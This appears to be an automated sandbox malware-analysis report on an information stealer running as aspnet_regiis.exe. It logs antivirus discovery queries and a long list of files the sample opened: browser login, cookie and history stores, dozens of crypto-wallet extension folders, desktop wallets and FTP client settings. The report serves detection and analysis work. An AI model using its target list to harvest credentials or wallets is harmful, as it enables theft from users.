                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: aspnet_regiis.exe, 00000003.00000002.3389909907.000000000345D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 4512, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
